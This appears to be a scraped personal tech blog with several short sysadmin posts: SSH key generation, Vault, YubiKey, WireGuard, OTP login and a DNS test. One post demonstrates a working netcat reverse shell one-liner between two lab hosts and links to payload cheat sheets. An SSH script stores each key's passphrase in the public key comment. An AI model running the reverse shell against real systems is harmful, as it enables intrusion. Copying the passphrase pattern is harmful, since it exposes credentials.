Security

If you need multiple SSH keys with passphrases for educational purposes, you can generate them as follows. The passphrase is set in the comments of the corresponding public key.

SSH Key Generator Script

cat << 'EOF' > /tmp/ssh-key-generator.sh
#!/usr/bin/env bash

# File
f=/tmp/id_ed25519

# Cleanup
test -f $f && rm $f $f.pub

# Gen Key
ssh-keygen -o -a 100 -t ed25519 -N "" -f ${f}

# Extact Password (last 8 Char from PubKey)
pw=$(cat ${f}.pub |cut -d" " -f 2 |gsed -E 's/^.{60}//')
pw2=$(echo $pw |gsed -E 's/\//x/g')
id=$(echo $pw2 |gsed -E 's/^....//')

# Rename
mv ${f}     ${f}-${id}
mv ${f}.pub ${f}-${id}.pub

# Set Var
x="${f}-${id}"
f="$x"

# Prepare Password
cat << EOF2 > ${f}.x
#!/bin/sh
echo $pw2
EOF2
chmod +x ${f}.x

# Set Comment
ssh-keygen -c -C "Password: $pw2" -f ${f}

# Set Password
ssh-keygen -p -N "$pw2" -f ${f}

# Show Key
cat ${f}.pub

# Add to Agent
DISPLAY=1 SSH_ASKPASS="${f}.x" ssh-add ${f} < /dev/null

# Cleanup
rm ${f}.x

exit 0
EOF

set Permission and run it

cd /tmp
chmod +x /tmp/ssh-key-generator.sh
./ssh-key-generator.sh; ls -la /tmp/id*

a few test runs

user@host /tmp$ ./ssh-key-generator.sh; ls -la id_ed25519-* 
Generating public/private ed25519 key pair.
Your identification has been saved in /tmp/id_ed25519
Your public key has been saved in /tmp/id_ed25519.pub
The key fingerprint is:
SHA256:IdJGeVPDOMrk9BidtIKrIzFBn8vNgjHVT8/sdSA9hik user@host
The key's randomart image is:
+--[ED25519 256]--+
| . .. .+.=*      |
|. o .==EB=.*     |
|.o oo=B*Boo o    |
| .= ++=+.= . .   |
|o. +.o  S . .    |
| o ..    .       |
|. o              |
| . .             |
|                 |
+----[SHA256]-----+
Old comment: user@host
Comment 'Password: S4seK144' applied
Key has comment 'Password: S4seK144'
Your identification has been saved with the new passphrase.
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMKxvcjpd8DvAfdO0nZ34uCxalQHgN0XUSRxS4seK144 Password: S4seK144
Identity added: /tmp/id_ed25519-K144 (Password: S4seK144)
-rw-------  1 user  wheel  464 Jan 25 22:36 id_ed25519-Bhxt
-rw-r--r--  1 user  wheel  100 Jan 25 22:36 id_ed25519-Bhxt.pub
-rw-------  1 user  wheel  464 Jan 25 22:30 id_ed25519-GCow
-rw-r--r--  1 user  wheel  100 Jan 25 22:30 id_ed25519-GCow.pub
-rw-------  1 user  wheel  464 Jan 25 22:36 id_ed25519-K144
-rw-r--r--  1 user  wheel  100 Jan 25 22:36 id_ed25519-K144.pub

sha256: 541867de7da5d482614e872eaf47c51578347c8ff3c2df980914795eb4515f61

how to Install and run Hashicorp Vault on OpenBSD

in addition to [https://blog.stoege.net/categories/vault/](this Blog Entry), here some instructions for OpenBSD.

Requirements

• VM with OpenBSD 7.2 (or older …) and root/doas permission
• Domain, or at least a FQDN Name pointing to your VM
• HTTP/HTTPS allowed from Internet (for Certificate Generation)
• Nginx installed (pkg_add nginx)

Source

https://developer.hashicorp.com/vault/docs/get-started/developer-qs

Install Vault

all the Steps must be run as root (or with doas)

pkg_add vault

Vault Config

Backup the prev. Config before …

Running YubiKey on OpenBSD

buy a Key and give try …

Source

https://www.yubico.com/

Install Software

pkg_add yubikey-manager-3.1.2p4

pkg_add yubikey-manager-3.1.2p4
quirks-6.42 signed on 2023-01-08T01:39:04Z
yubikey-manager-3.1.2p4:py3-click-7.1.2: ok
yubikey-manager-3.1.2p4:py3-pyusb-1.0.2p5: ok
yubikey-manager-3.1.2p4:pcsc-lite-1.9.8: ok
yubikey-manager-3.1.2p4:py3-cparser-2.19p2: ok
yubikey-manager-3.1.2p4:py3-cffi-1.15.1: ok
yubikey-manager-3.1.2p4:py3-cryptography-38.0.0p0: ok
yubikey-manager-3.1.2p4:py3-pyscard-2.0.3: ok
yubikey-manager-3.1.2p4:py3-openssl-22.0.0: ok
yubikey-manager-3.1.2p4:libyubikey-1.13p4: ok
yubikey-manager-3.1.2p4:json-c-0.16: ok
yubikey-manager-3.1.2p4:ykpers-1.20.0p2: ok
yubikey-manager-3.1.2p4: ok
The following new rcscripts were installed: /etc/rc.d/pcscd
See rcctl(8) for details.
--- +yubikey-manager-3.1.2p4 -------------------
NOTE: yubikey-manager (ykman) is only partially functional on OpenBSD.
Most of the "ykman fido xxx" commands (pin-setting and others) stall.

PC/SC Smart Card Daemon

rcctl enable pcscd
rcctl start pcscd

Attack Key

you have to Attack your Yubikey via USB Port … … and ask dmesg about the latest news ;)

Flask & JWT

getting your hands dirty with Flask and JWT

Source

• https://dev.to/grahammorby/jwt-auth-in-flask-python-18i4

with some modifications by myself …

Environment

Test under macOS & OpenBSD, Poetry installed and working

Script

build virtual env

export app="app100"
export FLASK_APP="${app}/app"
poetry new ${app}
cd ${app}

set python 3.10

poetry env use $(which python3.10)
gsed -i "s/python = \"^3.*$/python = \"^3.10\"/" pyproject.toml
poetry lock

add packages

wget -4 -O requirements.txt https://raw.githubusercontent.com/GrahamMorbyDev/jwt-flask/master/requirements.txt
echo "marshmallow-sqlalchemy" >> requirements.txt
poetry add $(awk -F '==' '!/sha256/{print $1}' requirements.txt |tr '\n' ' ')
wget -4 -O ${app}/app.py https://raw.githubusercontent.com/GrahamMorbyDev/jwt-flask/master/app.py
poetry shell

create db

Wireguard with Debian

Grab a Fresh Debian which has Public Internet Access. Target is to build a WG Tunnel and assign a Public IP to the Server.

Debian 11.6

apt-get install -y wireguard wireguard-tools

Gen Key

cd /etc/wireguard
umask 077; wg genkey | tee privatekey | wg pubkey > publickey

Set Vars

myprivkey=$(cat privatekey)
mypublicaddress="45.xx.xx.xx/28, 2a0e:xxxx:xxx::xxx/64"
yourpubkey="3XK8xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx="
yourpubip="45.xxx.xxx.xxx"
yourpubport="443"

Config

cat << EOF > wg0.conf
[Interface]
PrivateKey = ${myprivkey}
Address    = PUBLIC_IP_V4/xx, PUBLIC_IP_V6/xx
 
[Peer]
PublicKey  = ${yourpubkey}
Endpoint   = ${yourpubip}:${yourpubport}
AllowedIPs = 0.0.0.0/0, ::/0
PersistentKeepalive = 60
EOF

Tunnel UP

systemctl enable wg-quick@wg0
systemctl start  wg-quick@wg0
systemctl status wg-quick@wg0

Check IP

i3

sha256: c4d87bfca434aca32d6a8869720220b6ea4abe1ff534dd6e715cbb73d4f7025e

some Hands’on with Hashicorp Vault

Source

https://developer.hashicorp.com/vault/docs/get-started/developer-qs

Install on macos

brew tap hashicorp/tap
brew install hashicorp/tap/vault

Run on Docker

in Background, you have to kill it later

docker run -d -p 8200:8200 -e 'VAULT_DEV_ROOT_TOKEN_ID=dev-only-token' vault

Unseal Key: 2KTIMp0Md52V2xTb0txxxxxxxxxxxxxxxxxxxxxxxxx=
Root Token: dev-only-token

this is a dev instance only and has no persistent data. don’t worry.

Open Browser

• http://localhost:8200 -> root token

Export in Terminal

export VAULT_ADDR='http://0.0.0.0:8200'
export VAULT_TOKEN="dev-only-token"

Set Key

curl  --header "X-Vault-Token: $VAULT_TOKEN" \
      --header "Content-Type: application/json" \
      --request POST \
      --data '{"data": {"password": "Hashi123"}}' \
      -s http://127.0.0.1:8200/v1/secret/data/my-secret-password

-> Data get’s written to Store …

Whitelist IP Range

docker-compose.yml

  whoami:
    image: containous/whoami
    labels:
      - "traefik.enable=true"
      - "traefik.http.middlewares.test-ipwhitelist.ipwhitelist.sourcerange=127.0.0.1/32, x.x.x.x/y"
      - "traefik.http.routers.whoami.middlewares=test-ipwhitelist@docker"
      - "traefik.http.routers.whoami.rule=Host(`whoami.your.domain.de`)"
      - "traefik.http.routers.whoami.tls.certresolver=letsencrypt"
      - "traefik.http.routers.whoami.tls=true"

-> only “localhost” and SRC IP x.x.x.x/y can access this URL. Rest will be blocked. -> Disadvantage. Container needs to be restartet if the Source Range gets modified!

we can do this better :)

Move to File

you may want to put your “IP Ranges” to a dedicated File and import it where needed.

i don’t like ssh & password authentication. but sometime, specially during setup or recovery, it’s need and make sense. thought i’ll protect some boxes with otp. here a few notes and instrucations

Build login_otp

git clone https://github.com/reyk/login_otp
cd login_otp
make obj
make all
doas make install

Initialize OTP DB

doas otp -i

Generate Key for User

otp -g

Name: stoege
Key:  xxxx xxxx xxxx xxxx xxxx xxxx xx
URL:  otpauth://totp/stoege?secret=xxxxxxxxxxxxxxxxxxxxxxxxxx&issuer=&algorithm=SHA1&digits=6&period=30

Build QR Code

echo "otpauth://totp/stoege?secret=xxxxxxxxxxxxxxxxxxxxxxxxxx&issuer=&algorithm=SHA1&digits=6&period=30" |qrencode -t ansiutf8

and scan the code with the google authenticator (or similar app)

Reverse Shells

• https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
• https://kb.systemoverlord.com/security/postex/reverse/

Test it

Listen on Host A

Set Lister on Host A (192.168.1.100)

hostA # nc -l 4242

Start Reverse Shell on Host B

hostB # rm /tmp/f; mkfifo /tmp/f; /bin/sh -i 2>&1 </tmp/f |nc 192.168.1.100 4242 >/tmp/f

here we are

hostA # hostname
hostA.somewhere
hostA # nc -l 4242
hostB # hostname
hostB.somewhere

nice ;)

sha256: 0a5d01e633e102b0f3e258db89028946a247ef2296eab8dbf8819bc7472779c3

Talk from @mwl at BSDCAN 2022

https://www.youtube.com/watch?v=1n62VZj-CKI

OARC Reply Size Tester

dig +short rs.dns-oarc.net TXT

Host1 - good :)

# dig +short rs.dns-oarc.net TXT
rst.x4090.rs.dns-oarc.net.
rst.x4058.x4090.rs.dns-oarc.net.
rst.x4064.x4058.x4090.rs.dns-oarc.net.
"45.15.80.80 DNS reply size limit is at least 4090"
"45.15.80.80 sent EDNS buffer size 4096"

Host2 - bad :(

# dig +short rs.dns-oarc.net TXT
rst.x1196.rs.dns-oarc.net.
rst.x1206.x1196.rs.dns-oarc.net.
rst.x1204.x1206.x1196.rs.dns-oarc.net.
"74.63.25.240 DNS reply size limit is at least 1206"
"74.63.25.240 sent EDNS buffer size 1232"

sha256: 110b220f93eff767b7e4d488294b00ede4f4509258d0148704b145df79fa9821